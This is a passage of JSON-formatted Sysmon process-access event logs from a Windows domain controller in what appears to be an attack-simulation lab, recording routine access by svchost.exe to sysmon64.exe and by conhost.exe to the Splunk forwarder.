C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1876,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1877,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1878,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1879,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1880,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1881,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1882,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.734","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1883,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.734\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010AABE0300}\r\nTargetProcessId: 2612\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 